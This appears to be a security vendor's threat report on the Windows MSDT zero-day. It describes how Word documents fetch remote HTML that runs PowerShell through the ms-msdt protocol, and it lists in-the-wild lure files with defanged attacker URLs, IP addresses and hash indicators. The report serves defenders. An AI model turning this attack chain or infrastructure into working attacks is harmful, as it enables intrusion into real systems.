A zero-day vulnerability was discovered on Microsoft Windows Support Diagnostic Tool (MSDT).
On May 27, a researcher who goes by the twitter handle nao_sec discovered an interesting Microsoft Word document submitted from Belarus. The document calls out to an external HTML file which uses ms-msdt URL protocol to execute Powershell code.
How the Exploit Works
First, in a Microsoft Word file, an HTML file is referenced externally in “word\_rels\document.xml.rels”.
This file is responsible for defining relationships associated with embedded objects in the document. In this case, the relationship being referred to is an OLE object. OLE objects are part of Microsoft’s proprietary Object Linking and Embedding technology, which allows external documents, such as an Excel spreadsheet, to be embedded within a Word document.
In the Wild Attacks
The following are documents we have seen in-the-wild that exploit this vulnerability. Due to the sensitivity of some of the documents, we have redacted parts of the document contents.
This is the file first discovered by naosec that triggered the disclosure of this exploit. The file was first uploaded to VirusTotal on May 27 from an IP address geolocated in Belarus.
The doc file references the following html file:
This HTML contains the “ms-msdt:/” URI scheme followed by arguments and a Powershell code. The payload is base64 encoded. The decoded payload is another Powershell script, which kills the process of msdt.exe and extracts 05-2022-0438.rar into rgb.exe
We don’t know the nature of rbg.exe as we are unable to get a copy of the Rar file or rgb.exe.
This file was first submitted to VirusTotal on April 8, 2022. It references the following HTML file, “https://exchange[.]oufca[.]com.au/owa/auth/15.1.2375/themes/p3azx.html!”, which leads to “test.cab”, which downloads a base64 encoded Cobalt Strike BEACON from “220.127.116.11”.
This file was uploaded to Virustotal on May 5, 2022. It appears to be a memorandum sent to Philippine Armed Forces regarding securing the National Election. The election was held on May 9, 2022.
It references an HTML file from http://141[.]98.215.99/color.html.
РЭТ-ЮМ-3044 от 12.04.2022.doc
This file was uploaded to VT on April 13, 2022. It references the HTML from “https://www[.]sputnikradio.net/radio/news/1134.html!”. We are unable to get a copy of the HTML file.
VIP Invitation to Doha Expo 2023.rar
This file was first submitted to VT on June 1, 2022, presumably as an email attachment. Inside this Rar file is a document, VIP Invitation to Doha Expo 2023.docx, with sha256sum of 4fdec1c9111132a7f57fabfa83a6b7f73b3012d9100a790deaa53df184c1d4c4. It references an HTML file from https://files[.]attend-doha-expo[.]com/inv.html. The HTML retrieves a file from SMB share on 18.104.22.168, maps it into z: drive and executes a file on that share, osupdate.exe. The nature of osupdate.exe is unknown as we are not able to retrieve this file.
Juniper Advance Threat Protection (ATP) was able to natively detect this threat without the need for update or signature, using behavioral analysis and machine learning.
Indicators of Compromise
|fe300467c2714f4962d814a34f8ee631a51e8255b9c07106d44c6a1f1eda7a45||РЭТ-ЮМ-3044 от 12.04.2022.doc|
|d6be967d250f0be8e212cff9264fd0391a33f2ac00efeb508f7b79fca2fdf989||VIP Invitation to Doha Expo 2023.rar|
|4fdec1c9111132a7f57fabfa83a6b7f73b3012d9100a790deaa53df184c1d4c4||VIP Invitation to Doha Expo 2023.docx|